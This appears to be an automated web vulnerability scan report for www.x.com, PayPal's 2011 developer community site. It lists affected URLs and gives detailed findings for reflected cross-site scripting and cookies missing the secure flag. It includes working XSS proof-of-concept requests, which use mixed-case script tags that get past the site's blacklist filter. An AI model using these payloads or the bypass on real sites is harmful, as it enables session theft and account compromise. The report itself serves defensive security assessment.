7.70. https://www.x.com/community/ppx/xspaces/certification

7.71. https://www.x.com/community/ppx/xspaces/cloud-computing

7.72. https://www.x.com/community/ppx/xspaces/digital_goods

7.73. https://www.x.com/community/ppx/xspaces/finance

7.74. https://www.x.com/community/ppx/xspaces/forums

7.75. https://www.x.com/community/ppx/xspaces/gaming

7.76. https://www.x.com/community/ppx/xspaces/identity

7.77. https://www.x.com/community/ppx/xspaces/innovate

7.78. https://www.x.com/community/ppx/xspaces/introduce

7.79. https://www.x.com/community/ppx/xspaces/mobile

7.80. https://www.x.com/community/ppx/xspaces/mobile/mecl

7.81. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

7.82. https://www.x.com/community/ppx/xspaces/security

7.83. https://www.x.com/community/ppx/xspaces/social

7.84. https://www.x.com/community/ppx/xspaces/subscriptions

7.85. https://www.x.com/community/ppx/xspaces/toolkits

7.86. https://www.x.com/community/ppx/xspaces/web_checkout

7.87. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

7.88. https://www.x.com/community/ppx/xspaces/web_checkout/soap

7.89. https://www.x.com/community/xcommerce-blogs

7.90. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

7.91. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

7.92. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

7.93. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

7.94. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

7.95. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

7.96. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

7.97. https://www.x.com/community/xcommerce-blogs/blog/tags/adobe

7.98. https://www.x.com/community/xcommerce-blogs/blog/tags/andriod

7.99. https://www.x.com/community/xcommerce-blogs/blog/tags/apps

7.100. https://www.x.com/community/xcommerce-blogs/blog/tags/challenge

7.101. https://www.x.com/community/xcommerce-blogs/blog/tags/developer

7.102. https://www.x.com/community/xcommerce-blogs/blog/tags/developer_network

7.103. https://www.x.com/community/xcommerce-blogs/blog/tags/ebay

7.104. https://www.x.com/community/xcommerce-blogs/blog/tags/paypal

7.105. https://www.x.com/community/xcommerce-blogs/blog/tags/winners

7.106. https://www.x.com/community/xcommerce-blogs/blog/tags/x.commerce

7.107. https://www.x.com/community/xcommerce-blogs/blog/tags/xcommerce

7.108. https://www.x.com/doc-publish.jspa

7.109. https://www.x.com/docs/DOC-1031

7.110. https://www.x.com/docs/DOC-1041

7.111. https://www.x.com/docs/DOC-1051

7.112. https://www.x.com/docs/DOC-1106

7.113. https://www.x.com/docs/DOC-1106/delete

7.114. https://www.x.com/docs/DOC-1106/restore

7.115. https://www.x.com/docs/DOC-1108

7.116. https://www.x.com/docs/DOC-1116

7.117. https://www.x.com/docs/DOC-1176

7.118. https://www.x.com/docs/DOC-1204

7.119. https://www.x.com/docs/DOC-1216

7.120. https://www.x.com/docs/DOC-1332

7.121. https://www.x.com/docs/DOC-1372

7.122. https://www.x.com/docs/DOC-1374

7.123. https://www.x.com/docs/DOC-1401

7.124. https://www.x.com/docs/DOC-1431

7.125. https://www.x.com/docs/DOC-1551

7.126. https://www.x.com/docs/DOC-1613

7.127. https://www.x.com/docs/DOC-2241

7.128. https://www.x.com/docs/DOC-2346

7.129. https://www.x.com/docs/DOC-3201

7.130. https://www.x.com/docs/DOC-3212

7.131. https://www.x.com/docs/DOC-3251

7.132. https://www.x.com/docs/DOC-3271

7.133. https://www.x.com/docs/DOC-3321

7.134. https://www.x.com/docs/DOC-3322

7.135. https://www.x.com/docs/DOC-3323

7.136. https://www.x.com/docs/DOC-3345

7.137. https://www.x.com/docs/DOC-3351

7.138. https://www.x.com/docs/DOC-3352

7.139. https://www.x.com/docs/DOC-3353

7.140. https://www.x.com/docs/DOC-3354

7.141. https://www.x.com/docs/DOC-3355

7.142. https://www.x.com/docs/DOC-3371

7.143. https://www.x.com/docs/DOC-3372

7.144. https://www.x.com/docs/DOC-3373

7.145. https://www.x.com/docs/DOC-3374

7.146. https://www.x.com/docs/DOC-3375

7.147. https://www.x.com/docs/DOC-3426

7.148. https://www.x.com/docs/DOC-3427

7.149. https://www.x.com/docs/DOC-3431

7.150. https://www.x.com/docs/DOC-3443

7.151. https://www.x.com/docs/DOC-3444

7.152. https://www.x.com/docs/DOC-3491

7.153. https://www.x.com/docs/DOC-3561

7.154. https://www.x.com/docs/DOC-3562

7.155. https://www.x.com/docs/DOC-3619

7.156. https://www.x.com/docs/DOC-3688

7.157. https://www.x.com/docs/DOC-3811

7.158. https://www.x.com/docs/DOC-3811/delete

7.159. https://www.x.com/docs/DOC-3811/restore

7.160. https://www.x.com/docs/DOC-3812

7.161. https://www.x.com/docs/DOC-3836

7.162. https://www.x.com/docs/DOC-3841

7.163. https://www.x.com/docs/emailPasswordToken!input.jspa

7.164. https://www.x.com/emailPasswordToken!input.jspa

7.165. https://www.x.com/groups/

7.166. https://www.x.com/ideas/

7.167. https://www.x.com/index.jspa

7.168. https://www.x.com/main-apps.jspa

7.169. https://www.x.com/message/186684

7.170. https://www.x.com/message/198017

7.171. https://www.x.com/message/211333

7.172. https://www.x.com/message/211439

7.173. https://www.x.com/message/211738

7.174. https://www.x.com/message/212001

7.175. https://www.x.com/message/212124

7.176. https://www.x.com/message/212170

7.177. https://www.x.com/message/212753

7.178. https://www.x.com/message/212906

7.179. https://www.x.com/message/213354

7.180. https://www.x.com/message/213546

7.181. https://www.x.com/message/213568

7.182. https://www.x.com/message/213571

7.183. https://www.x.com/message/213767

7.184. https://www.x.com/message/213787

7.185. https://www.x.com/message/213788

7.186. https://www.x.com/message/213865

7.187. https://www.x.com/message/214347

7.188. https://www.x.com/message/214440

7.189. https://www.x.com/message/214618

7.190. https://www.x.com/message/214902

7.191. https://www.x.com/message/214926

7.192. https://www.x.com/message/215245

7.193. https://www.x.com/message/215254

7.194. https://www.x.com/message/215264

7.195. https://www.x.com/message/215276

7.196. https://www.x.com/message/215291

7.197. https://www.x.com/people

7.198. https://www.x.com/people/

7.199. https://www.x.com/people/BaldGeek

7.200. https://www.x.com/people/BaldGeek/blog

7.201. https://www.x.com/people/CorinneSherman

7.202. https://www.x.com/people/GiancarloUk2

7.203. https://www.x.com/people/IndieReign

7.204. https://www.x.com/people/JasonVenner

7.205. https://www.x.com/people/MrcheckAPX

7.206. https://www.x.com/people/PP_Igor

7.207. https://www.x.com/people/PP_MTS_Andre

7.208. https://www.x.com/people/PP_MTS_Chad

7.209. https://www.x.com/people/PP_MTS_GuidoT

7.210. https://www.x.com/people/PP_MTS_Magarvin

7.211. https://www.x.com/people/PP_MTS_Patrick

7.212. https://www.x.com/people/PayPalXadmin

7.213. https://www.x.com/people/PayPal_Carolyn

7.214. https://www.x.com/people/PayPal_Sudha

7.215. https://www.x.com/people/PayPal_ToddS

7.216. https://www.x.com/people/Praveen

7.217. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

7.218. https://www.x.com/people/RightWayMail

7.219. https://www.x.com/people/S.Aijaz

7.220. https://www.x.com/people/SRS

7.221. https://www.x.com/people/Saleem

7.222. https://www.x.com/people/Shade8934

7.223. https://www.x.com/people/Suneetha

7.224. https://www.x.com/people/admin

7.225. https://www.x.com/people/amypiazza00

7.226. https://www.x.com/people/angelleye

7.227. https://www.x.com/people/billday

7.228. https://www.x.com/people/blingnation2010

7.229. https://www.x.com/people/bryngregory

7.230. https://www.x.com/people/das_licht

7.231. https://www.x.com/people/dchankhour

7.232. https://www.x.com/people/eferreira

7.233. https://www.x.com/people/emailPasswordToken!input.jspa

7.234. https://www.x.com/people/encore

7.235. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

7.236. https://www.x.com/people/gazugafan

7.237. https://www.x.com/people/gem

7.238. https://www.x.com/people/gogoeric

7.239. https://www.x.com/people/hotellina

7.240. https://www.x.com/people/iConcessionStand

7.241. https://www.x.com/people/joncas

7.242. https://www.x.com/people/lwhite2104

7.243. https://www.x.com/people/mandeheritage

7.244. https://www.x.com/people/odeskdev

7.245. https://www.x.com/people/omuleanu

7.246. https://www.x.com/people/pluto26

7.247. https://www.x.com/people/posiden5665

7.248. https://www.x.com/people/ramonmorales123

7.249. https://www.x.com/people/rizkygarut

7.250. https://www.x.com/people/roguereptile

7.251. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

7.252. https://www.x.com/people/sebastian.kopp@wooga.com

7.253. https://www.x.com/people/skier

7.254. https://www.x.com/projects/

7.255. https://www.x.com/search.jspa

7.256. https://www.x.com/tags

7.257. https://www.x.com/tags/

7.258. https://www.x.com/threads

8. Email addresses disclosed

8.1. https://www.x.com/community/feeds/blogs

8.2. https://www.x.com/community/feeds/documents

8.3. https://www.x.com/community/feeds/messages

8.4. https://www.x.com/community/feeds/popularthreads

8.5. https://www.x.com/community/feeds/unansweredthreads

8.6. https://www.x.com/community/ppx/businesspayments

8.7. https://www.x.com/community/ppx/devchallenge

8.8. https://www.x.com/community/ppx/devchallenge/

8.9. https://www.x.com/community/ppx/devtalk

8.10. https://www.x.com/community/ppx/devzone

8.11. https://www.x.com/community/ppx/global/uk

8.12. https://www.x.com/docs/DOC-1106

8.13. https://www.x.com/docs/DOC-1106.pdf

8.14. https://www.x.com/docs/DOC-1431

8.15. https://www.x.com/docs/DOC-1551

8.16. https://www.x.com/docs/DOC-1613

8.17. https://www.x.com/docs/DOC-2241

8.18. https://www.x.com/message/198017

8.19. https://www.x.com/message/212753

8.20. https://www.x.com/message/213865

8.21. https://www.x.com/message/214902

8.22. https://www.x.com/message/215254

8.23. https://www.x.com/message/215291

8.24. https://www.x.com/people/BaldGeek

8.25. https://www.x.com/people/BaldGeek.vcf

8.26. https://www.x.com/people/CorinneSherman

8.27. https://www.x.com/people/PayPal_Sudha

8.28. https://www.x.com/people/angelleye

8.29. https://www.x.com/people/encore

8.30. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

8.31. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

8.32. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

8.33. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

8.34. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

8.35. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

8.36. https://www.x.com/themes/paypal/js/custom.js

9. Social security numbers disclosed

10. Credit card numbers disclosed

10.1. https://www.x.com/community/feeds/documents

10.2. https://www.x.com/docs/DOC-2241

11. Cacheable HTTPS response

11.1. https://www.x.com/dwr/interface/Clearvote.js

11.2. https://www.x.com/ideas/

11.3. https://www.x.com/opensearch.xml

11.4. https://www.x.com/people

11.5. https://www.x.com/people/

11.6. https://www.x.com/people/BaldGeek

11.7. https://www.x.com/people/BaldGeek.vcf

11.8. https://www.x.com/people/BaldGeek/blog

11.9. https://www.x.com/people/CorinneSherman

11.10. https://www.x.com/people/GiancarloUk2

11.11. https://www.x.com/people/IndieReign

11.12. https://www.x.com/people/JasonVenner

11.13. https://www.x.com/people/MrcheckAPX

11.14. https://www.x.com/people/PP_Igor

11.15. https://www.x.com/people/PP_MTS_Andre

11.16. https://www.x.com/people/PP_MTS_Chad

11.17. https://www.x.com/people/PP_MTS_GuidoT

11.18. https://www.x.com/people/PP_MTS_Magarvin

11.19. https://www.x.com/people/PP_MTS_Patrick

11.20. https://www.x.com/people/PayPalXadmin

11.21. https://www.x.com/people/PayPal_Carolyn

11.22. https://www.x.com/people/PayPal_Sudha

11.23. https://www.x.com/people/PayPal_ToddS

11.24. https://www.x.com/people/Praveen

11.25. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

11.26. https://www.x.com/people/RightWayMail

11.27. https://www.x.com/people/S.Aijaz

11.28. https://www.x.com/people/SRS

11.29. https://www.x.com/people/Saleem

11.30. https://www.x.com/people/Shade8934

11.31. https://www.x.com/people/Suneetha

11.32. https://www.x.com/people/admin

11.33. https://www.x.com/people/amypiazza00

11.34. https://www.x.com/people/angelleye

11.35. https://www.x.com/people/billday

11.36. https://www.x.com/people/blingnation2010

11.37. https://www.x.com/people/bryngregory

11.38. https://www.x.com/people/das_licht

11.39. https://www.x.com/people/dchankhour

11.40. https://www.x.com/people/eferreira

11.41. https://www.x.com/people/encore

11.42. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

11.43. https://www.x.com/people/gazugafan

11.44. https://www.x.com/people/gem

11.45. https://www.x.com/people/gogoeric

11.46. https://www.x.com/people/hotellina

11.47. https://www.x.com/people/iConcessionStand

11.48. https://www.x.com/people/joncas

11.49. https://www.x.com/people/lwhite2104

11.50. https://www.x.com/people/mandeheritage

11.51. https://www.x.com/people/odeskdev

11.52. https://www.x.com/people/omuleanu

11.53. https://www.x.com/people/pluto26

11.54. https://www.x.com/people/posiden5665

11.55. https://www.x.com/people/ramonmorales123

11.56. https://www.x.com/people/rizkygarut

11.57. https://www.x.com/people/roguereptile

11.58. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

11.59. https://www.x.com/people/sebastian.kopp@wooga.com

11.60. https://www.x.com/people/skier

11.61. https://www.x.com/resources/scripts/fancyzoom/images/

11.62. https://www.x.com/resources/scripts/tiny_mce3

11.63. https://www.x.com/servlet/JiveServlet/download/1052-1-1034/pp_dev_Datasheet_API_R3.pdf

11.64. https://www.x.com/servlet/JiveServlet/download/1481-1-1070/pp_dev_Datasheet_PPX_R3.pdf

11.65. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

11.66. https://www.x.com/tags

11.67. https://www.x.com/themes/paypal/images/favicon.ico

11.68. https://www.x.com/threads

12. HTML does not specify charset

12.1. https://www.x.com/dwr/interface

12.2. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

13. Content type incorrectly stated

13.1. https://www.x.com/dwr/interface/Clearvote.js

13.2. https://www.x.com/opensearch.xml

13.3. https://www.x.com/view-video-short.jspa

14. SSL certificate



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.x.com/blogs/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc106"><ScRiPt>alert(1)</ScRiPt>180668780e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /blogs/?cc106"><ScRiPt>alert(1)</ScRiPt>180668780e6=1 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=254072 t=1313157109864597
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="/main-blogposts.jspa?cc106"><ScRiPt>alert(1)</ScRiPt>180668780e6=1&amp;start=0"
class="jive-pagination-current" >
...[SNIP]...

1.2. https://www.x.com/community/ppx/xspaces/introduce [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05d5"><ScRiPt>alert(1)</ScRiPt>8ef9c8977ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /community/ppx/xspaces/introduce?c05d5"><ScRiPt>alert(1)</ScRiPt>8ef9c8977ed=1 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323032343b31342c323032333b31342c323036343b31342c323033343b31342c323032353b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=269298 t=1313157066395842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="/community/ppx/xspaces/introduce?c05d5"><ScRiPt>alert(1)</ScRiPt>8ef9c8977ed=1&amp;start=0"
class="jive-pagination-current" >
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 222 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://www.x.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 12 Aug 2011 01:59:23 GMT
Server: Apache-Coyote/1.1
Location: https://www.x.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; Path=/
Set-Cookie: jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; Version=1; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=1446 t=1313114363172657
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: NSC_xxx.y.dpn-443=44ed4e27151d;path=/


2.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/josh/2011/03/29/paypal-integration-resources

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/josh/2011/03/29/paypal-integration-resources HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=80251 t=1313157101873077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/matt/2010/08/10/retrieving-your-api-credentials

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/matt/2010/08/10/retrieving-your-api-credentials HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=155557 t=1313157101339194
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.4. https://www.x.com/community/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/home HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:30 GMT; Path=/
Vary: User-Agent
JP: D=85622 t=1313157030208430
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.5. https://www.x.com/community/ppx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=86365 t=1313157084689243
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.6. https://www.x.com/community/ppx/adaptive_accounts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_accounts

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_accounts HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031383b31342c323036333b31342c323031373b31342c323031363b31342c323030363b31342c323234363b31342c323031353b31342c323031333b31342c323236393b31342c323232313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=100210 t=1313157059307917
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

